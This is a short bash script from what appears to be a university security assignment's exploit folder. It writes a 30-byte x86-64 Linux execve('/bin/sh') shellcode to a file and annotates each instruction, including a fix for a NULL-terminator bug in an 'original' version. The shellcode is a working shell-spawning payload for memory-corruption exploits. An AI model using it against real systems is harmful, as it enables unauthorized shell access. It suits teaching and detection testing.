path: root/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
#!/bin/bash
# Writes the raw x86-64 Linux execve("/bin/sh") byte sequence below to a file
# named `shellcode` in the current working directory. The `>` redirection
# truncates any existing file of that name.
#
# Notes for readers:
#  - `echo -e` is a bash extension: it interprets the \xHH escapes and also
#    appends a trailing newline (0x0a) after the last byte, so the file is one
#    byte longer than the 30-byte sequence documented below.
#  - This is the textbook /bin/sh execve stub. The shape (zeroed %rdx,
#    "//bin/sh" assembled in a register, argv built on the stack, syscall
#    0x3b) is what x86-64 shell-spawn shellcode signatures typically key on,
#    which is why a sample like this is useful for detection testing as well
#    as for the exercise.
echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode

# This shellcode translates as follows. execve(2) ABI on x86-64 Linux:
# %rdi = pathname, %rsi = argv, %rdx = envp, %rax = syscall number (0x3b).
#
#  "\x48\x31\xd2"                             // xor %rdx, %rdx        -- envp = NULL; also the NULL used below
#  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx   -- "//bin/sh" (little-endian)
#  "\x48\xc1\xeb\x08"                         // shr $0x8, %rbx        -- drops the leading '/', leaving "/bin/sh\0"
#  "\x53"                                     // push %rbx             -- NUL-terminated path now on the stack
#  "\x48\x89\xe7"                             // mov %rsp, %rdi        -- pathname = pointer to "/bin/sh"
#  "\x52"                                     // push %rdx             -- NULL terminator for argv.
#                                                                      // There is an error in the "original": it used push %rax here.
#                                                                      // %rax is not zeroed at that point, so it pushes an arbitrary
#                                                                      // value instead of NULL and execve fails with EFAULT (-14).
#                                                                      // See man execve.
#  "\x57"                                     // push %rdi             -- argv[0] = pointer to "/bin/sh"
#  "\x48\x89\xe6"                             // mov %rsp, %rsi        -- argv = {"/bin/sh", NULL}
#  "\xb0\x3b"                                 // mov $0x3b, %al        -- only %al is written; the upper bits of %rax are assumed already zero
#  "\x0f\x05"                                 // syscall               -- execve("/bin/sh", argv, NULL)